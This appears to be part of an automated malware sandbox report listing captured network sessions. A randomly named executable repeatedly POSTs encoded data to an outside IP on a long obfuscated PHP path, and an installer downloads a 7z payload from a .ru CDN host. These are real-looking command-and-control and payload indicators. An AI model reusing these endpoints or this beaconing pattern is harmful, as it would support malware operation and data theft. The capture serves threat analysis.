                                                                                                                      Data Ascii: P[C\^CU_T^PY[[YRYTY^W]Q^YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.'!Z1:5]6994:_78>Y,$'2.]&2\7/?Z/ ]!![ ,
                                                                                                                      Dec 8, 2024 15:28:47.665875912 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:47.896572113 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:47 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      63192.168.2.449927185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:48.130521059 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2580
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:48.482836962 CET2580OUTData Raw: 55 5e 43 57 5e 40 55 54 54 5e 50 59 5b 58 59 53 59 5a 59 5b 57 51 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U^CW^@UTT^PY[XYSYZY[WQQ]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Y$.![%9]"#![.-4/^/'>%3-1)#$/+ ]!![
                                                                                                                      Dec 8, 2024 15:28:49.560025930 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:49.690546989 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:49 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      64192.168.2.449930185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:49.925580025 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:50.278917074 CET2584OUTData Raw: 55 58 43 56 5b 47 55 5e 54 5e 50 59 5b 5e 59 53 59 58 59 56 57 51 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UXCV[GU^T^PY[^YSYXYVWQQZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Y0=&$9&! &:$6X78.X/$#26X%+2",(/; ]!![ 8


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      65192.168.2.449934185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:51.087480068 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:51.438301086 CET1904OUTData Raw: 50 5f 46 50 5e 44 50 54 54 5e 50 59 5b 59 59 5e 59 58 59 59 57 5d 51 5d 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P_FP^DPTT^PY[YY^YXYYW]Q]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Y'=.$*%Z!U::$-78>_,/$#&2^%8>"<7[/ ]!![ $
                                                                                                                      Dec 8, 2024 15:28:52.407707930 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:52.644364119 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:52 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 39 50 25 1c 20 0a 28 29 39 00 25 2c 0e 01 25 3b 2f 5c 29 09 2f 5c 27 07 3c 5a 38 39 2b 1c 34 02 28 5e 30 03 30 58 22 3c 2f 50 2d 38 20 5a 06 10 21 5b 25 3f 33 12 3c 02 2d 5e 26 5e 25 0a 35 09 15 42 33 3e 34 08 3d 14 3a 5f 23 01 37 1e 32 3d 26 0c 2d 26 3e 5f 26 1e 0e 08 31 1c 2c 55 0f 1f 26 52 24 1c 3c 0c 23 24 25 0c 35 20 09 14 25 0b 2a 51 36 3f 0d 09 2a 2e 3b 07 3f 22 38 1f 20 22 0d 59 2c 2b 25 5d 3d 22 09 1d 30 06 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: 9P% ()9%,%;/\)/\'<Z89+4(^00X"</P-8 Z![%?3<-^&^%5B3>4=:_#72=&-&>_&1,U&R$<#$%5 %*Q6?*.;?"8 "Y,+%]="0 S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      66192.168.2.449936185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:51.210522890 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:51.560235977 CET2584OUTData Raw: 50 59 43 5d 5b 42 50 55 54 5e 50 59 5b 59 59 5e 59 5d 59 59 57 53 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PYC][BPUT^PY[YY^Y]YYWSQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.'-)$9)6)94 ^6[8;;%>%V.X%! +[/+ ]!![ $
                                                                                                                      Dec 8, 2024 15:28:52.535586119 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:52.768261909 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:52 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      67192.168.2.449941185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:53.009546995 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:28:53.356987000 CET2584OUTData Raw: 55 5b 46 56 5e 40 55 5f 54 5e 50 59 5b 5a 59 5b 59 54 59 5b 57 56 51 5e 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U[FV^@U_T^PY[ZY[YTY[WVQ^YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-%-529=50%-2^ >^,^$T%.^236Y'+! / /+ ]!![ (
                                                                                                                      Dec 8, 2024 15:28:54.329621077 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:54.568438053 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:54 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      68192.168.2.449947185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:54.802606106 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:55.154283047 CET2584OUTData Raw: 50 53 43 51 5e 42 55 55 54 5e 50 59 5b 59 59 59 59 5d 59 58 57 54 51 57 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PSCQ^BUUT^PY[YYYY]YXWTQWYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.^0>-%6" 5X-:4:;%.$1&;>] <#.+ ]!![ $
                                                                                                                      Dec 8, 2024 15:28:56.121335983 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:56.356427908 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:55 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      69192.168.2.449951185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:56.601273060 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:56.950685024 CET2584OUTData Raw: 55 5b 46 51 5b 40 55 53 54 5e 50 59 5b 5c 59 5a 59 54 59 57 57 57 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U[FQ[@UST^PY[\YZYTYWWWQZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-$=1&%X63&:& :_,(<0=010&*Y (.+ ]!![ 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      70192.168.2.449955185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:57.782557011 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:58.138880968 CET1904OUTData Raw: 50 58 43 50 5e 47 50 55 54 5e 50 59 5b 5d 59 5d 59 5e 59 58 57 52 51 5e 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PXCP^GPUT^PY[]Y]Y^YXWRQ^YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Z%=.29]# )X,$!4;6,8%><^2 *%>^4?<, ]!![ 4
                                                                                                                      Dec 8, 2024 15:28:59.171087027 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:59.404311895 CET380INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:58 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 3a 0f 26 25 23 54 3d 3a 3a 59 25 3c 20 01 24 3b 3b 5c 3e 0e 0a 05 33 07 28 5b 38 03 3f 54 37 05 20 5e 27 3d 06 1e 20 2c 3c 0e 2c 38 20 5a 06 10 21 5b 25 3f 3f 5b 3c 15 03 14 32 3b 3e 18 36 24 3f 09 30 04 3c 08 29 14 07 06 23 2f 24 0b 31 03 03 11 2f 25 26 15 26 56 33 1d 31 1c 2c 55 0f 1f 26 19 27 1c 0d 1e 22 27 22 1d 20 20 37 5b 32 1b 26 18 23 3c 30 1b 2b 3d 2f 03 3c 0c 0a 59 23 21 27 59 2d 28 2d 5c 3f 32 27 1e 33 3c 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: :&%#T=::Y%< $;;\>3([8?T7 ^'= ,<,8 Z![%??[<2;>6$?0<)#/$1/%&&V31,U&'"'" 7[2&#<0+=/<Y#!'Y-(-\?2'3< S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      71192.168.2.449956185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:28:57.941849947 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2580
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:58.294572115 CET2580OUTData Raw: 55 58 43 54 5b 42 50 52 54 5e 50 59 5b 58 59 58 59 55 59 5a 57 5d 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UXCT[BPRT^PY[XYXYUYZW]Q\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y._'.)^26#0%\. 8_8$$/' %1! '[.; ]!![ ,
                                                                                                                      Dec 8, 2024 15:28:59.336906910 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:59.576364994 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:59 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      HTTPS Proxied Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.449730172.67.184.1094436036C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-08 14:26:58 UTC191OUTGET /checker/release/update/SandeLLoCHECKER_Installer-FILES.7z HTTP/1.1
                                                                                                                      Accept: */*
                                                                                                                      User-Agent: AdvancedInstaller
                                                                                                                      Host: cdn.semkrill.ru
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cache-Control: no-cache
                                                                                                                      2024-12-08 14:27:00 UTC889INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:26:59 GMT
                                                                                                                      Content-Length: 12251984
                                                                                                                      Connection: close
                                                                                                                      last-modified: Mon, 01 Apr 2024 16:09:40 GMT
                                                                                                                      etag: "baf350-6150b3787a349"
                                                                                                                      strict-transport-security: max-age=31536000;
                                                                                                                      CF-Cache-Status: MISS
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nOFIbpOWtT7%2BF978Gb%2B5z26FuqpCg7QJQIWNNuCzCxWTagYRJURWeBDbmx%2FVV8wwQgPEkvKmJ%2FxAbm7UGZGLRKZTmg60sy0xh4TralWQBnEOObFCYBUkhrHu6dDIbnWEauU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8eed6efefbed238e-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1973&rtt_var=746&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=805&delivery_rate=1479979&cwnd=232&unsent_bytes=0&cid=3a687beca8f19f5f&ts=1290&x=0"
                                                                                                                      2024-12-08 14:27:00 UTC480INData Raw: 37 7a bc af 27 1c 00 04 89 c1 09 3f 11 f3 ba 00 00 00 00 00 1f 00 00 00 00 00 00 00 a6 42 f8 56 e1 85 1d c0 06 5d 00 20 19 48 66 a7 e1 74 df 0f fb 80 6e ea 2f b6 7c 7d 14 f4 66 f6 18 58 2b 10 c6 a2 72 42 d6 fc 85 f8 40 06 b0 b2 25 00 8f 0b 3a d6 11 63 d9 d8 ee 36 7b 74 92 f7 9b 48 d1 dd 2f 75 ea 81 3c 9b 40 3a 01 c5 6e ad d1 7a 63 e9 a9 39 f1 8b d9 34 92 61 91 3a b5 73 49 8a 22 32 ab 11 1e ec 87 4b 8f 3e 87 b3 29 7a 1f e1 15 6f c5 9c 5e 1e 69 2e b1 58 00 31 29 da ee 8a 72 a8 06 b1 ed 8a 64 0f d5 2e 72 0e 3a 08 50 bc 11 b7 11 a4 1d 68 11 c5 2f c5 e0 07 36 0f 34 9d c9 ff 5a 94 12 95 51 8f c1 80 2b 2c 44 98 ff 2c 2f 74 86 88 13 ca c6 07 47 03 30 82 3c a7 9e d4 15 24 e1 72 f3 38 f0 c0 1b dd 59 00 f5 45 47 b0 1e b9 94 3b 9c 88 81 ce 3c 20 42 dc 15 d4 0e 45 ea
                                                                                                                      Data Ascii: 7z'?BV] Hftn/|}fX+rB@%:c6{tH/u<@:nzc94a:sI"2K>)zo^i.X1)rd.r:Ph/64ZQ+,D,/tG0<$r8YEG;< BE
